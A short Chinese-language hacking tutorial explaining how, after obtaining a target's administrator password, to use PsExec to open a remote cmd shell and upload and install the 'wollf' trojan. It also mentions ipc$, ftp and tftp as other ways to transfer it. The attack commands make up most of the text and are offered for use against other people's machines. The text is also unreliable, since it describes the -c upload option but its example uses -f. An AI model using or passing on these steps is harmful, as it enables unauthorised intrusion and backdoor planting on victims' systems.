准备工具:psexec
在获得里对方管理员的密码后.
在本地进入cmd,输入psexec \\ip -u 帐号 -p 密码 c:\winnt\system32\cmd.exe
这样就连接到里对方的cmd shell,接下来可以用ftp传马马.ipc$也可以. 补充一下.psexec有个选项-c 可以上传本地的文件到远程机器
假如要上传wollf到对方机器上,可用如下格式
psexec \\ip -u adminuser -p pass -f wollf.exe c:\(对方的路径)
接下下就可以连到对方的cmd shell,安装wollf
除了ipc$,ftp也可以啊.还有原来玩unicode的时候.把自己的机器做成一个tftp服务器,用tftp命令来传,方法很多.最简单的还是使用他自带的这个命令选项.